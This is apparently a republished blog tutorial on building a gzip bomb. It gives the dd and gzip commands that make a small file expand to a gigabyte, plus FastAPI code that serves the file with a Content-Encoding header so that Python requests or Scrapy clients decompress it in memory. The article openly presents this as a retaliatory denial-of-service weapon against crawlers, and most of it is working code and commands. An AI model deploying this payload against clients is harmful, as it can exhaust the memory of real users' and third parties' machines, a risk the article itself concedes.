BestHub
Sign in
Information Security 7 min read

How to Use Gzip Compression to Overload Web Crawlers (Gzip Bomb Tutorial)

This guide shows how to create a tiny gzip‑compressed file, serve it with FastAPI, and exploit automatic decompression in Python's requests library to force a crawler to consume massive memory, effectively turning compression into a denial‑of‑service weapon.

Liangxu Linux
Liangxu Linux
Liangxu Linux
How to Use Gzip Compression to Overload Web Crawlers (Gzip Bomb Tutorial)

Web site owners often suffer from aggressive crawlers that waste bandwidth and CPU; this article demonstrates a retaliatory technique that leverages the automatic gzip/deflate decoding performed by popular HTTP clients such as requests and Scrapy.

First, a simple text file text.txt is created and compressed with the gzip command to produce data.gz: cat text.txt | gzip > data.gz A minimal FastAPI server ( server.py) is then written to serve the compressed file:

from fastapi import FastAPI
from fastapi.responses import FileResponse
app = FastAPI()

@app.get('/')
def index():
    resp = FileResponse('data.gz')
    return resp

Running the server with uvicorn server:app and requesting the endpoint via requests returns garbled binary data because the response lacks a Content-Encoding: gzip header.

Adding the header fixes the display:

from fastapi import FastAPI
from fastapi.responses import FileResponse
app = FastAPI()

@app.get('/')
def index():
    resp = FileResponse('data.gz')
    resp.headers['Content-Encoding'] = 'gzip'  # indicate gzip compression
    return resp

With the header present, requests automatically decompresses the payload, turning a tiny .gz file into the original large content on the client side.

The compression principle is illustrated: a 192‑character string of repeated "1" can be represented by just five characters, achieving a 97.4% reduction. If a 1 GB file is compressed to 1 MB, the server sends only 1 MB, but the client must allocate the full 1 GB to decompress it, potentially exhausting memory.

Large gzip bombs can be generated with a single command. On Linux:

dd if=/dev/zero bs=1M count=1000 | gzip > boom.gz

On macOS:

dd if=/dev/zero bs=1048576 count=1000 | gzip > boom.gz

These commands create a ~995 KB boom.gz that expands to a 1 GB file when decompressed ( gzip -d boom.gz). Adjusting count yields larger or smaller bombs; a demonstration uses count=10 to produce a 10 KB gzip file that expands to 10 MB.

When the FastAPI endpoint serves this 10 KB gzip bomb, a requests call returns a Response object whose memory footprint is about 10 MB, confirming that automatic decompression can be abused to inflate memory usage.

Important caution: this method should only be applied when the request is confidently identified as coming from a crawler; otherwise legitimate users may be unintentionally disabled.

References:

Binary Response Content : https://2.python-requests.org/en/master/user/quickstart/#binary-response-content

网站gzip炸弹 – 王春伟的技术博客: http://da.dadaaierer.com/?p=577

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

gzipweb securityFastAPIcompressionrequestsDenial of Service
Liangxu Linux
Written by

Liangxu Linux

Liangxu, a self‑taught IT professional now working as a Linux development engineer at a Fortune 500 multinational, shares extensive Linux knowledge—fundamentals, applications, tools, plus Git, databases, Raspberry Pi, etc. (Reply “Linux” to receive essential resources.)

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment